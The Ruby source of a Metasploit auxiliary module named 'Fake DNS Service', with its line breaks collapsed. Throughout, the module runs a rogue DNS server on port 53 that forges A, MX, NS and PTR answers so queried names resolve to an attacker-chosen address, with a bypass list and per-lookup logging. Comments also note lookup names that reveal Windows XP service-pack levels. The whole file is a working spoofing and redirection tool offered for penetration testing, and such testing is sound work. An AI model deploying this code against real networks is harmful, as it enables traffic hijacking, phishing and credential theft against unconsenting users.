## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'resolv' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize super( 'Name' => 'Fake DNS Service', 'Description' => %q{ This module provides a DNS service that redirects all queries to a particular address. }, 'Author' => ['ddz', 'hdm'], 'License' => MSF_LICENSE, 'Actions' => [ [ 'Service' ] ], 'PassiveActions' => [ 'Service' ], 'DefaultAction' => 'Service' ) register_options( [ OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 53 ]), OptAddress.new('TARGETHOST', [ false, "The address that all names should resolve to", nil ]), OptString.new('TARGETDOMAIN', [ true, "The list of target domain names we want to fully resolve (BYPASS) or fake resolve (FAKE)", 'www.google.com']), OptEnum.new('TARGETACTION', [ true, "Action for TARGETDOMAIN", "BYPASS", %w{FAKE BYPASS}]), ], self.class) register_advanced_options( [ OptBool.new('LogConsole', [ false, "Determines whether to log all request to the console", true]), OptBool.new('LogDatabase', [ false, "Determines whether to log all request to the database", false]), ], self.class) end def run @targ = datastore['TARGETHOST'] if(@targ and @targ.strip.length == 0) @targ = nil end if(@targ) @targ = ::Rex::Socket.resolv_to_dotted(@targ) end @port = datastore['SRVPORT'].to_i @log_console = false @log_database = false if (datastore['LogConsole'].to_s.match(/^(t|y|1)/i)) @log_console = true end if (datastore['LogDatabase'].to_s.match(/^(t|y|1)/i)) @log_database = true end # MacOS X workaround ::Socket.do_not_reverse_lookup = true print_status("DNS server initializing") @sock = ::UDPSocket.new() @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) @sock.bind(datastore['SRVHOST'], @port) @run = true @domain_target_list = datastore['TARGETDOMAIN'].split @bypass = ( datastore['TARGETACTION'].upcase == "BYPASS" ) print_status("DNS server started") begin while @run @error_resolving = false packet, addr = @sock.recvfrom(65535) @requestor = addr break if packet.length == 0 request = Resolv::DNS::Message.decode(packet) # # XXX: Track request IDs by requesting IP address and port # # Windows XP SP1a: UDP source port constant, # sequential IDs since boot time # Windows XP SP2: Randomized IDs # # Debian 3.1: Static source port (32906) until timeout, # randomized IDs # lst = [] request.each_question {|name, typeclass| tc_s = typeclass.to_s().gsub(/^Resolv::DNS::Resource::/, "") request.qr = 1 request.ra = 1 lst << "#{tc_s} #{name}" case tc_s when 'IN::A' # Special fingerprinting name lookups: # # _isatap -> XP SP = 0 # isatap.localdomain -> XP SP >= 1 # teredo.ipv6.microsoft.com -> XP SP >= 2 # # time.windows.com -> windows ??? # wpad.localdomain -> windows ??? # # SOA -> windows XP self hostname lookup # answer = Resolv::DNS::Resource::IN::A.new( @targ || ::Rex::Socket.source_address(addr[3].to_s) ) # Identify potential domain exceptions @match_target = false @match_name = name.to_s @domain_target_list.each do |ex| escaped = Regexp.escape(ex).gsub('\*','.*?') regex = Regexp.new "^#{escaped}$", Regexp::IGNORECASE if ( name.to_s =~ regex ) @match_target = true @match_name = ex end end if (@match_target and not @bypass) or (not @match_target and @bypass) # Resolve FAKE response if (@log_console) print_status("DNS target domain found: #{@match_name}") print_status("DNS target domain #{name.to_s} faked") end else # Resolve the exception domain begin ip = Resolv::DNS.new().getaddress(name).to_s answer = Resolv::DNS::Resource::IN::A.new( ip ) rescue ::Exception => e @error_resolving = true next end if (@log_console) print_status("DNS bypass domain found: #{@match_name}") print_status("DNS bypass domain #{name.to_s} resolved #{ip}") end end request.add_answer(name, 60, answer) when 'IN::MX' mx = Resolv::DNS::Resource::IN::MX.new(10, Resolv::DNS::Name.create("mail.#{name}")) ns = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create("dns.#{name}")) ar = Resolv::DNS::Resource::IN::A.new( @targ || ::Rex::Socket.source_address(addr[3].to_s) ) request.add_answer(name, 60, mx) request.add_authority(name, 60, ns) request.add_additional(Resolv::DNS::Name.create("mail.#{name}"), 60, ar) when 'IN::NS' ns = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create("dns.#{name}")) ar = Resolv::DNS::Resource::IN::A.new( @targ || ::Rex::Socket.source_address(addr[3].to_s) ) request.add_answer(name, 60, ns) request.add_additional(name, 60, ar) when 'IN::PTR' soa = Resolv::DNS::Resource::IN::SOA.new( Resolv::DNS::Name.create("ns.internet.com"), Resolv::DNS::Name.create("root.internet.com"), 1, 3600, 3600, 3600, 3600 ) ans = Resolv::DNS::Resource::IN::PTR.new( Resolv::DNS::Name.create("www") ) request.add_answer(name, 60, ans) request.add_authority(name, 60, soa) else lst << "UNKNOWN #{tc_s}" end } if(@log_console) if(@error_resolving) print_error("XID #{request.id} (#{lst.join(", ")}) - Error resolving") else print_status("XID #{request.id} (#{lst.join(", ")})") end end if(@log_database) report_note( :host => addr[3], :type => "dns_lookup", :data => "#{addr[3]}:#{addr[1]} XID #{request.id} (#{lst.join(", ")})" ) if lst.length > 0 end @sock.send(request.encode(), 0, addr[3], addr[1]) end rescue ::Exception => e print_error("fakedns: #{e.class} #{e} #{e.backtrace}") # Make sure the socket gets closed on exit ensure @sock.close end end def print_error(msg) @requestor ? super("%s:%p - DNS - %s" % [@requestor[3], @requestor[1], msg]) : super(msg) end def print_status(msg) @requestor ? super("%s:%p - DNS - %s" % [@requestor[3], @requestor[1], msg]) : super(msg) end end